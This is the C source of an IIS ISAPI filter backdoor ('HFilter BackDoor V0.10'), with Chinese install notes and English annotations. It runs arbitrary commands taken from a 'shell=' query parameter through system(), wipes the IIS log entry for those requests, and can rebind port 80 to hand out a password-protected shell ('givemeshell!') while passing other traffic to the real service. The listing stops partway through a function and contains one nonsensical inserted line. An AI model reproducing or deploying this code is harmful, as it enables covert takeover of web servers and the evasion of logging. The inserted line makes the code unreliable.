//**********************************************************************
//
// Win32 ISAPI/Filter BackDoor V0.10.
// By Lion, http://www.cnhonker.com
//
// 使用方法:
// 1. 通过注册表键
//
// [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters]
// "Filter DLLs"="c:\\winnt\\system\\inetsrv\\filter.dll"
//
// 重启IIS服务
//
// 2. 通过 Internet管理器 -> ISAPI筛选器 添加
//
//**********************************************************************
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <httpfilt.h>
#include <EXCPT.H>
#include <WTYPES.H>
//#include <winsock2.h>
#pragma comment (lib,"Ws2_32.lib")
#define PORT 80
#define PASS "givemeshell!"
#define LOGFILE "c:\\log.txt"
#define BUFFER_SIZE 200
#define TIMEOUT 10
#define PROMPT "# "
// Per-session bookkeeping for a spawned shell (pipes, process, client socket,
// relay threads). Nothing in the visible part of this file references it; the
// code that fills it in (GetShell/BindShell) is defined elsewhere.
typedef struct
{
// Created when the session is established
HANDLE ReadPipeHandle; // pipe carrying the shell process's stdout
HANDLE WritePipeHandle; // pipe feeding the shell process's stdin
HANDLE ProcessHandle; // handle of the shell process
// Created when a client connection arrives
SOCKET ClientSocket; // the connected client socket
HANDLE ReadShellThreadHandle; // thread that reads data from the shell
HANDLE WriteShellThreadHandle; // thread that writes data to the shell
} SESSION_DATA, *PSESSION_DATA;
// Forward declarations. Only ReBindShell and (partially) ClientThread are
// defined in the visible part of this file; LogToFile, BindShell, GetShell and
// SlowSend are defined elsewhere, so their behaviour cannot be confirmed here.
DWORD WINAPI ClientThread(LPVOID lp); // per-connection relay / password check
DWORD WINAPI ReBindShell(LPVOID); // listener that rebinds the IIS port
DWORD WINAPI LogToFile(char *buf); // presumably appends to LOGFILE (c:\log.txt) — not visible
DWORD WINAPI BindShell(LPVOID);
VOID GetShell();
VOID SlowSend(char* sendbuf, int iTime);
// Global state. It is written from the IIS filter callback thread
// (HttpFilterProc) and from the listener thread (ReBindShell) with no
// synchronisation visible in this file.
BOOL bLog =true; // logging switch; not consulted by any visible code
char host[32]; // not used by any visible code
int port=PORT; // port the listener rebinds (PORT == 80)
HANDLE hReBind,TempExeHandle; // hReBind: listener thread handle, NULL when no listener is running
DWORD dThreadId; // thread id returned by CreateThread for the listener
SOCKET s, ClientSock; // s: listening socket; ClientSock: client socket handed to GetShell()
// Banner text; not referenced by any visible code, but a usable string
// indicator for this binary.
char *messages = "============================= HFilter BackDoor V0.10 =========================="\
"\r\n=============== Code by Lion. Welcome to http://www.cnhonker.com ==============\r\n";
// DLL entry point. Nothing is done on process attach or detach; all activity
// is driven by the ISAPI filter callbacks (GetFilterVersion / HttpFilterProc).
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved )
{
switch( ul_reason_for_call )
{
case DLL_PROCESS_ATTACH:
{
break;
}
//case DLL_THREAD_ATTACH:
//case DLL_THREAD_DETACH:
// Thread attach/detach notifications match no case and are ignored.
case DLL_PROCESS_DETACH:
{
break;
}
}
return TRUE;
}
// GetFilterVersion - called by IIS when the filter DLL is loaded.
// Registers for the SF_NOTIFY_LOG notification on both secure and non-secure
// ports with high priority, so HttpFilterProc runs once per request at log
// time. The description string "HUC Filter V1.0" is recorded by IIS for this
// filter and is a static indicator of this DLL.
BOOL WINAPI GetFilterVersion(HTTP_FILTER_VERSION * pVer)
{
// Notification flags; they decide which events HttpFilterProc receives.
pVer->dwFlags = (
SF_NOTIFY_SECURE_PORT |
SF_NOTIFY_NONSECURE_PORT |
// SF_NOTIFY_SEND_RESPONSE |
// SF_NOTIFY_END_OF_NET_SESSION |
// SF_NOTIFY_READ_RAW_DATA |
// SF_NOTIFY_SEND_RAW_DATA |
SF_NOTIFY_LOG|
SF_NOTIFY_ORDER_HIGH);
pVer->dwFilterVersion = HTTP_FILTER_REVISION;
// Unbounded strcpy into the fixed-size lpszFilterDesc field; the literal is short.
strcpy( pVer->lpszFilterDesc, "HUC Filter V1.0" );
return TRUE;
}
// HttpFilterProc - the filter's notification callback, invoked by IIS.
// Only SF_NOTIFY_LOG is handled, i.e. the filter acts after the request has
// already been served, when IIS is about to write the log record.
// Behaviour on a request whose QUERY_STRING contains "shell=":
//   - the value after "shell=" selects an action: "rebindshell" starts the
//     ReBindShell listener thread, "stopbind" tears it down, and anything
//     else is passed verbatim to system() — i.e. arbitrary command execution
//     in the security context of the IIS worker process;
//   - the request's log fields are then blanked so the W3SVC log does not
//     record it. Detection therefore has to rely on network-level capture
//     (the "shell=" query parameter) or on the file LogToFile writes to
//     (presumably LOGFILE, c:\log.txt), not on the IIS logs.
// Every other request has its pszTarget written to the same log file.
// Returns SF_STATUS_REQ_NEXT_NOTIFICATION in all cases.
DWORD WINAPI HttpFilterProc(HTTP_FILTER_CONTEXT *pfc,
DWORD NotificationType,
VOID * pvNotification)
{
// OutputDebugString("Entered HttpFilterProc\n");
switch (NotificationType)
{
case SF_NOTIFY_LOG:
{
PHTTP_FILTER_LOG pLogData;
char Buff[4096];
TCHAR sz[2560];
ULONG i;
pLogData = (PHTTP_FILTER_LOG)pvNotification;
// Unbounded sprintf into sz; relies on host/server names being short.
sprintf(sz, "Client: %s , Server: %s\r\n",
pLogData->pszClientHostName,
pLogData->pszServerName);
// Trigger check: the query string contains "shell=",
// e.g. http://host.ip/any.asp?shell=xxxxxx
i=4096;
memset(Buff,0, i);
// Return value is not checked; on failure Buff keeps the zeroed contents.
pfc->GetServerVariable(pfc, "QUERY_STRING", Buff, &i);
if(strstr(Buff, "shell="))
{
LogToFile(sz);
LogToFile(Buff);
LogToFile("\r\n\n");
char *p;
p=strstr(Buff, "shell=")+6;
// Dispatch on the remainder of the query string after "shell="
// (compared case-insensitively as a whole).
if(stricmp(p, "rebindshell")==0)
{
if(hReBind)
{
// A listener thread is already recorded; refuse to start a second one.
LogToFile("ReBindShell error.\r\n");
}
else
{
hReBind = CreateThread(NULL,0, ReBindShell,(LPVOID)NULL,0, &dThreadId);
if(hReBind==NULL)
{
LogToFile("ReBindShell Thread Creat Failed!\r\n\n");
}
else
{
LogToFile("ReBindShell Thread Creat Sussess!\r\n\n");
}
}
}
else if(stopbind_is_requested_placeholder_never_used(p)) {}
else if(stricmp(p, "stopbind")==0)
{
// Hard-kill the listener thread and close both sockets; TerminateThread
// gives the thread no chance to release anything it holds.
if(hReBind)
TerminateThread(hReBind, 0);
if(hReBind)
CloseHandle(hReBind);
if(ClientSock)
closesocket(ClientSock);
if(s)
closesocket(s);
hReBind = NULL;
LogToFile("Closed Re BindShell.\r\n");
}
else
{
// Any other value is executed as a shell command.
LogToFile("System : ");
LogToFile(p);
system(p);
}
// Blank the IIS log record for this request. Each string field is
// truncated by writing '\0' (NULL) through a cast that discards const.
*(char *)pLogData->pszClientUserName = NULL;
*(char *)pLogData->pszClientUserName = NULL;
*(char *)pLogData->pszServerName = NULL;
*(char *)pLogData->pszOperation = NULL;
*(char *)pLogData->pszTarget = NULL;
*(char *)pLogData->pszParameters = NULL;
// The remaining fields are DWORD values, not pointers: each cast turns the
// numeric value (e.g. an HTTP status of 200) into an address and writes to
// it, which is almost certainly an access violation rather than a log edit.
*(char *)pLogData->dwHttpStatus = NULL;
*(char *)pLogData->dwWin32Status = NULL;
*(char *)pLogData->dwBytesSent = NULL;;
*(char *)pLogData->dwBytesRecvd = NULL;
*(char *)pLogData->msTimeForProcessing = NULL;
// return SF_STATUS_REQ_FINISHED;
}
else
{
// Non-trigger request: record its target URL.
LogToFile("Get Other: ");
LogToFile((char *)pLogData->pszTarget);
LogToFile("\r\n\n");
}
}
break;
default:
break;
}
return SF_STATUS_REQ_NEXT_NOTIFICATION;
}
// Called by IIS when the filter is unloaded. Performs no cleanup: a running
// listener thread and any open sockets are left as they are.
BOOL WINAPI TerminateFilter( DWORD dwFlags )
{
return true;
}
// Listener thread started by the "rebindshell" trigger.
// Resolves the local host name, binds a new TCP socket to that address on
// `port` (80) with SO_REUSEADDR — sharing the port IIS already listens on —
// and accepts connections in a loop, spawning ClientThread for each one.
// Since the filter runs inside the IIS process, this listener presumably shows
// up as a second port-80 socket owned by that process, bound to the host's
// specific address rather than the wildcard; that is the observable footprint.
// Returns -1 on any setup failure (earlier resources are not released on
// those paths) and 0 if the accept loop is ever left.
DWORD WINAPI ReBindShell(LPVOID)
{
BOOL val;
SOCKADDR_IN saddr;
SOCKADDR_IN scaddr;
int caddsize;
SOCKET sc;
WSADATA wsaData;
WORD wVersionRequested;
wVersionRequested = MAKEWORD( 2, 2 );
if(WSAStartup( wVersionRequested, &wsaData ) != 0)
{
LogToFile("Start Socket error!\r\n");
return -1;
}
saddr.sin_family = AF_INET;
struct hostent * hp;
unsigned char LocalName[256];
// Obtain the local IP address via the host name.
gethostname((char*)LocalName, sizeof(LocalName)-1);
if((hp = gethostbyname((char*)LocalName)) == NULL)
{
LogToFile("Get local IP -Gethostbyname failed!\r\n");
return -1;
}
// Original author's note: bind a specific IP and leave 127.0.0.1 to the
// legitimate service; ClientThread then relays through that address so the
// normal application keeps working.
// Socket Init.
memset(&saddr,0,sizeof(saddr));
memcpy(&saddr.sin_addr.s_addr, hp->h_addr_list[0], hp->h_length); // first address for the local host name
saddr.sin_port = htons(port);
saddr.sin_family = AF_INET;
if((s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR)
{
LogToFile("error!socket failed!\n");
return -1;
}
val = TRUE;
// SO_REUSEADDR is what allows binding a port that is already in use.
if(setsockopt(s,SOL_SOCKET,SO_REUSEADDR,(char *)&val,sizeof(val))!=0)
{
LogToFile("error!setsockopt failed!\n");
return -1;
}
// Original author's note: had the existing listener used SO_EXCLUSIVEADDRUSE,
// this bind would fail with an access-denied error. Leaving the IIS socket
// without that option is what makes the port rebind possible.
if(bind(s,(SOCKADDR *)&saddr,sizeof(saddr))==SOCKET_ERROR)
{
LogToFile("error!bind failed!\n");
return -1;
}
listen(s,2);
while(1)
{
HANDLE mt;
caddsize = sizeof(scaddr);
// Accept a connection request.
sc = accept(s,(struct sockaddr *)&scaddr, &caddsize);
if(sc!=INVALID_SOCKET)
{
DWORD tid;
// One thread per client connection; the socket is passed as the LPVOID.
mt = CreateThread(NULL,0,ClientThread,(LPVOID)sc,0,&tid);
if(mt==NULL)
{
LogToFile("Thread Creat Failed!\n");
break;
}
LogToFile("Get a Connect!\r\n");
}
// Runs even when accept() failed, in which case mt was never assigned.
// When it did succeed this only drops the handle; the thread keeps running.
CloseHandle(mt);
}
closesocket(s);
return 0;
}
DWORD WINAPI ClientThread(LPVOID lp)
{
SOCKET ss = (SOCKET)lp;
SOCKET sc;
char buf[4096], sendbuf[1024];
SOCKADDR_IN saddr;
long num;
DWORD val;
int times = 0;
// 如果是隐藏端口应用的话,可以在此处加一些判断
// 如果是自己的包,就可以进行一些特殊处理,不是的话通过127.0.0.1进行转发
saddr.sin_family = AF_INET;
saddr.sin_addr.s_addr = inet_addr("127.0.0.1");
saddr.sin_port = htons(port);
if((sc=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR)
{
LogToFile("error!socket failed!\n");
return -1;
}
val = 100;
if(setsockopt(sc,SOL_SOCKET,SO_RCVTIMEO,(char *)&val,sizeof(val))!=0)
{
return -1;
}
val = TIMEOUT*1000;
if(setsockopt(ss,SOL_SOCKET,SO_RCVTIMEO,(char *)&val,sizeof(val))!=0)
{
return -1;
}
if(connect(sc,(SOCKADDR *)&saddr,sizeof(saddr))!=0)
{
LogToFile("error!socket connect failed!\n");
closesocket(sc);
closesocket(ss);
return -1;
}
while(1)
{
// 下面的代码主要是实现通过127.0.0.1这个地址把包转发到真正的应用上,
// 并把应答的包再转发回去。
num = recv(ss, buf, 1024,0);
if(num>0)
{
times ++;
if(times == 1 && strstr(buf, PASS) && num>0)
{
sprintf(sendbuf, "give me shell!\r\n");
LogToFile(sendbuf);
// send(ss, sendbuf, strlen(sendbuf), 0);
if(sc)
closesocket(sc);
ClientSock = ss;
GetShell();
}
else
{
send(sc,buf,num,0);
}
}
else if(num==0) break;